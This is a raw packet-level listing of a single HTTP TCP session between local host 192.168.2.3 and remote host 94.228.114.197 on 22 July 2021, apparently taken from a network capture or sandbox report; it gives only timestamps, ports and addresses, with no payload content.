Jul 22, 2021 11:28:04.617290974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.617342949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.695977926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696023941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696077108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696126938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696182013 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696187973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696244001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696295023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696347952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696400881 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696453094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696453094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696502924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696556091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696568012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696614981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696619987 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696669102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696702003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696724892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696777105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696815968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696827888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696877956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696917057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.696933985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.696969032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697014093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697029114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697082043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697103977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697133064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697173119 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697211027 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697218895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697256088 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697293997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697325945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697330952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697365999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697415113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697453022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697490931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697491884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697527885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697563887 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697575092 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697603941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697627068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697639942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697688103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697726011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697734118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697771072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697808027 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697834969 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697844982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697884083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697901964 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.697922945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697961092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.697977066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698009968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698054075 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698054075 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698091030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698127985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698157072 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698164940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698200941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698236942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698239088 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698272943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698276997 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698318958 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698354006 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698360920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698398113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698434114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698441982 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.698472023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.698489904 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.707077026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.707964897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779064894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779190063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779236078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779284954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779328108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779366970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779407024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779411077 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779444933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779481888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779519081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779556036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779603004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779624939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779644966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779685020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779722929 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779752016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779762983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779799938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779819965 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779838085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779875040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779891968 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779922962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.779964924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.779964924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780003071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780019045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780041933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780081034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780117035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780118942 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780154943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780230045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780230045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780266047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780287981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780308008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780344963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780388117 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780391932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780433893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780472994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780494928 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780512094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780550003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780565977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780587912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780625105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780628920 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780663967 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780700922 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780713081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780755997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780760050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780792952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780832052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780858040 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780869007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780905962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780945063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.780962944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.780982971 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781025887 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781029940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781073093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781100988 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781110048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781148911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781182051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781188011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781224966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781263113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781286955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781301022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781347990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781358957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781390905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781426907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781428099 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781466007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781502962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781505108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781541109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781555891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781579018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781615973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781655073 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781662941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781707048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781744003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781748056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781784058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781806946 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781822920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781860113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781871080 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781898022 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781934977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.781976938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.781980991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782023907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782059908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782066107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782098055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782121897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782135963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782171965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782186031 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782211065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782248020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782284975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782295942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782336950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782373905 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782375097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782412052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782437086 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782449961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782486916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782505989 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782525063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782562017 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782608986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782609940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782649994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782689095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782696962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782727003 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782764912 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782773018 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782800913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782838106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782852888 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782876015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782919884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.782947063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782989025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.782995939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783026934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783066034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783075094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783102989 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783162117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783179998 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783199072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783237934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783247948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783276081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783323050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783350945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783365965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783402920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783432007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783441067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783487082 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783513069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783523083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783561945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783585072 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783598900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783644915 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783683062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783688068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783725023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783762932 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783775091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783812046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783865929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783890963 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783929110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.783931017 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.783967018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784023046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784037113 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784060001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784097910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784125090 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784136057 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784182072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784185886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784224033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784261942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784300089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784320116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784337044 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784373999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784410954 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784419060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784447908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784495115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784537077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784552097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784573078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784578085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784610987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784650087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784657955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784687042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784723997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784734011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784763098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784795046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784810066 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784851074 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784852028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784889936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784926891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.784950972 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.784965038 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785001040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785013914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.785037994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785074949 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785074949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.785121918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785124063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.785181046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785203934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.785219908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.785307884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.786432981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.790338993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.790381908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.790483952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.790596962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.864531040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864584923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864622116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864654064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.864660025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864739895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864746094 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.864782095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864819050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864856005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864900112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864934921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.864973068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865006924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865021944 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865036964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865083933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865128040 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.865052938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.865164995 CEST	80	49720	94.228.114.197	192.168.2.3
